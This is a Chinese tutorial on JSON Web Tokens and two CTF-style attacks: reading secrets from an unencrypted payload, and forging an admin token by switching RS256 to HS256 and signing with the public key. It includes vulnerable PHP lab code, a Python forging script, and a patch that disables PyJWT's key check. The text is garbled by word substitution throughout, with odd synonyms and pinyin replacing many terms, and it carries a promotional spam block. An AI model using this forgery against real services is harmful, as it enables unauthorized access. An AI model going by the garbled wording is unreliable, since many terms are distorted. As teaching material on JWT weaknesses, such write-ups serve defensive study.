jwt
jwt,它是一种用于通信双方之间通报安全信息的简洁的、URL安全的表述性声明规范,是一种标准化的格式,用于在系统之间发送经由加mi署名的JSON数据,理论上可以包含任何类型的数据,但最常用于发送关于用户的信息(“声明”),以进行身份认证、会话处理和访问掌握。
大略理解了它的定义后,我们接下来来看一下jwt的组成部分它分为三个部分,如下所示
1、Headers:头部2、Payload:有效载荷3、Signature:署名
这三个部分以.符号来连接
HeadersHeaders常日由两部分组成,令牌的类型和署名算法,常见的算法有很多种,例如 HMAC SHA256或 RSA。但它也还有一个kid参数,这是一个可选参数,全称是key ID,它用于指定加mi算法的密miyao。
示例如下
ewogICJhbGciOiAiSFMyNTYiLAogICJ0eXAiOiAiSldUIgp9
这便是一个Headers,当我们对它进行Base64解码就可以看到它的详细内容,详细如下
{ "alg": "HS256", "typ": "jwt"}
alg指的便是算法,这里的算法便是HS256,typ指的是令牌类型。这里须要解释一点,便是明文在加mi时实在采取的是Base64URL加mi,这种加mi办法并非Base64encode+URLencode,而是对一些分外字符进行了更换,详细解释如下
jwt 作为一个令牌,有些场合可能会放到 URL(比如 api.example.com/?token=xxx)。Base64有三个字符+、/和=,在 URL 里面有分外含义,以是要被更换掉:=被省略、+更换成-,/更换成_ 。这便是 Base64URL 算法。
Payload有效载荷便是存放有效信息的地方,个中包含声明。声明包含三个部分 1、已注册声明这个部分的话便是已经预先定义过的声明,常见的声明紧张有以下几种
iss: jwt签发者sub: jwt所面向的用户aud: 吸收jwt的一方exp: jwt的过期韶光,这个过期韶光必须要大于签发韶光nbf: 定义在什么韶光之前,该jwt都是不可用的.iat: jwt的签发韶光jti: jwt的唯一身份标识,紧张用来作为一次性token,从而回避重放攻击。
2、公共的声明这些可以由利用 jwt 的人随意定义,一样平常用于添加用户的干系信息或其他业务须要的必要信息。但不建议添加mingan信息,由于该部分在客户端可进行解码.3、私有的声明这些是为在赞许利用它们的各方之间共享信息而创建的自定义声明,私有声明是供应者和消费者所共同定义的声明,一样平常不建议存放mingan信息。
示例如下
ewoJInN1YiI6ICJhZG1pbiIsCiAgICAidXNlcl9yb2xlIiA6ICJhZG1pbiIsCiAgICAiaXNzIjogImFkbWluIiwKICAgICJpYXQiOiAxNTczNDQwNTgyLAogICAgImV4cCI6IDE1NzM5NDAyNjcsIAogICAgIm5iZiI6IDE1NzM0NDA1ODIsIAogICAgImp0aSI6ICJkZmY0MjE0MTIxZTgzMDU3NjU1ZTEwYmQ5NzUxZDY1NyIgICAKfQ
进行base64URL解码,结果如下
{ "sub": "admin", //jwt所面向的用户 "user_role" : "admin", //当前登任命户 "iss": "admin", //该jwt的签发者,有些是URL "iat": 1573440582, //签发韶光 "exp": 1573940267, //过期韶光 "nbf": 1573440582, //该韶光之前不吸收处理该Token "jti": "dff4214121e83057655e10bd9751d657" //Token唯一标识}Signature
由于头部和有效载荷以明文形式存储,因此,须要利用署名来防止数据被修改。以是这部分是一个签证信息,这个签证信息由三部分组成
1、header (base64URL编码)2、payload (base64URL编码)3、secret(miyao)
它的打算办法如下
Signature=HMACSHA256(base64UrlEncode(header) + "." +base64UrlEncode(payload),secret)//假设这里是HS256算法,如果是其他算法的话开头设置为其他算法即可
现在理解了jwt的大致浸染和其组成,接下来来学习一下jwt攻击。
【----帮助网安学习,须要网安学习资料关注我,私信回答“资料”免费获取----】① 网安学习发展路径思维导图② 60+网安经典常用工具包③ 100+SRC漏洞剖析报告④ 150+网安攻防实战技能电子书⑤ 最威信CISSP 认证考试指南+题库⑥ 超1800页CTF实战技巧手册⑦ 最新网安大厂口试题合集(含答案)⑧ APP客户端安全检测指南(安卓+IOS)
jwt 攻击jwt攻击有多种情形,现在来对其进行逐一讲解。
mingan信息xieloujwt担保的是数据传输过程中的完全性而不是机密性。
由于jwt的payload部分是利用Base64url编码的,以是它实在是相称于明文传输的,当payload中携带了mingan信息时,我们对payload部分进行Base64url解码,就可以读取到payload中携带的mingan信息。
靶场演示题目描述如下
jwt的头部和有效载荷这两部分的数据因此明文形式传输的,如果个中包含了mingan信息的话,就会发生mingan信息xielou。试着找出FLAG。格式为 flag{}
进入环境后创造一个登录框
随便输入zhanghao mima,登录后创造界面如下
查看此时的jwt
想到题目中说头部和载荷可能会有敏感透露,将值取出分别进行Base64URL解码
两处拼接一下,得到ctfhub{bb89d985db8cea6a2f2d34cb}
算法修正攻击首先来简述一下jwt中两个常用的加mi算法
HMAC(HS256):是一种对称mi算法,利用秘密miyao对每条进行署名和验证RSA(RS256):是一种非对称mi算法,利用私yaomi明文,公yao解mi。
从上面不丢脸出,HS256自始至终只有一个miyao,而RS256是有两个miyao的。在常日情形下,HS256的miyao我们是不能取到的,RS256的miyao也是很难得到的,RS256的的公yao相对较随意马虎获取,但无论是HS256加mi还是RS256加mi,都是无法实现假造jwt的,但当我们修正RSA256算法为HS256算法时,后端代码会利用公yao作为miyao,然后用HS256算法验证署名,如果我们此时有公yao,那么此时我们就可与实现jwt的假造。
靶场演示题目描述
有些jwt库支持多种mima算法进行署名、验签。若目标利用非对称mima算法时,有时攻击者可以获取到公yao,此时可通过修正jwt头部的署名算法,将非对称mima算法改为对称mima算法,从而达到攻击者目的。
进入环境后创造题目代码
class jwtHelper { public static function encode($payload=array(), $key='', $alg='HS256') { return jwt::encode($payload, $key, $alg); } public static function decode($token, $key, $alg='HS256') { try{ $header =jwtHelper::getHeader($token); $algs = array_merge(array($header->alg, $alg)); return jwt::decode($token, $key, $algs); } catch(Exception $e){ return false; } } public static function getHeader($jwt) { $tks = explode('.', $jwt); list($headb64, $bodyb64, $cryptob64) = $tks; $header = jwt::jsonDecode(jwt::urlsafeB64Decode($headb64)); return $header; }}$FLAG = getenv("FLAG");$PRIVATE_KEY = file_get_contents("/privatekey.pem");$PUBLIC_KEY = file_get_contents("./publickey.pem");if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (!empty($_POST['username']) && !empty($_POST['password'])) { $token = ""; if($_POST['username'] === 'admin' && $_POST['password'] === $FLAG){ $jwt_payload = array( 'username' => $_POST['username'], 'role'=> 'admin', ); $token = jwtHelper::encode($jwt_payload, $PRIVATE_KEY, 'RS256'); } else { $jwt_payload = array( 'username' => $_POST['username'], 'role'=> 'guest', ); $token = jwtHelper::encode($jwt_payload, $PRIVATE_KEY, 'RS256'); } @setcookie("token", $token, time()+1800); header("Location: /index.php"); exit(); } else { @setcookie("token", ""); header("Location: /index.php"); exit(); }} else { if(!empty($_COOKIE['token']) && jwtHelper::decode($_COOKIE['token'], $PUBLIC_KEY) != false) { $obj = jwtHelper::decode($_COOKIE['token'], $PUBLIC_KEY); if ($obj->role === 'admin') { echo $FLAG; } } else { show_source(__FILE__); }}?>
大略的看一下,大存问思便是当以用户名为admin,mima不是$flag时,此时登录后jwt中payload的role是guest,而只有当role为admin时才能够得到Flag,以是我们这里肯定是须要假造jwt的,我们先以admin为用户名,随便输入mima登录一下此时得到jwt,将其拿去解mi一下
创造加mi办法是RS256非对称加mi,想到在登录时,下方给出了公yao
以是这里就可以考试测验变动算法为HS256,以公yao作为miyao来进行署名和验证,因此我们布局一个假造jwt的脚本,内容如下
import jwtimport base64public ="""-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqizf1rnxqfeyCAp52TQO3uEyeB1HzqqbO8FBHWqLlhgmyPFqaopXVhZryzP+Sd6a3iQd8xeD7URswPHE4roAkbI1GMta9zAdD1yPtp//JNZ55hx1iFY2n9gw2u8VL64n9sCc56H46L3W52Z37kvWq5LuoLAuyJpP7Ofadt7biWaeXibZGQjPwlbCy31DyxdDFCt8pVrajVI97w3amHBUXhd0Ku+DOq9hjadtQbTkbIkAUR84yqt+25EXd/rg1w8we9ysNcTjAeUayRGPuQmXUWJaFpsvuL7WeUb2xJqvieFwsCQppS1ZgaoRc0F835K+G3s3qWRi4AnvZxryfTzlawIDAQAB-----END PUBLIC KEY-----"""payload={ "username": "admin","role": "admin"}print(jwt.encode(payload, key=public, algorithm='HS256'))
此时运行完后创造报错
这个是由于源代码中进行了校验,我们大略设置一下即可,源代码文件地址如下
/usr/lib/python3/dist-packages/jwt/algorithms.py
我们在它的校验前面增加这样一句话
invalid_strings=[]
此时保存退出,再运行文件即可得到新jwt
将新的JWT拿到网站中更换旧的JWT,刷新网站即可得到flag
全部完全内容请至合天网安实验室网站浏览。
